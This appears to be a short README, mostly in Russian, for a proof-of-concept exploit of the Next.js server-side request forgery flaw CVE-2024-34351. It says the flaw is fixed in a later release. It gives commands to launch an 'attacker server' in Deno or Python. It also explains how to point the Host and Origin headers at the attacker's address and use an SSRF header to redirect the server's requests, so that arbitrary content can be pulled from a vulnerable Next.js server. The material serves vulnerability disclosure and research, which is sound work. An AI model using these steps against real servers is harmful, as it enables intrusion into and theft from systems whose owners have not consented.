
PoC for a full exploitation of NextJS SSRF (CVE-2024-34351)
PoC для полной эксплуатации SSRF в NextJS. Злоумышленник может получить любое содержимое веб-сайта с сервера Next.js, используя уязвимость CVE-2024-34351.
Данная уязвимость исправлена в [email protected].
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host на сервер злоумышленника. (например, Host: 192.198.0.144:8000)Origin на сервер злоумышленника. (например, Origin: http://192.198.0.144:8000/)SSRF, чтобы указать, куда перенаправлять. (например, SSRF: http://example.com/test)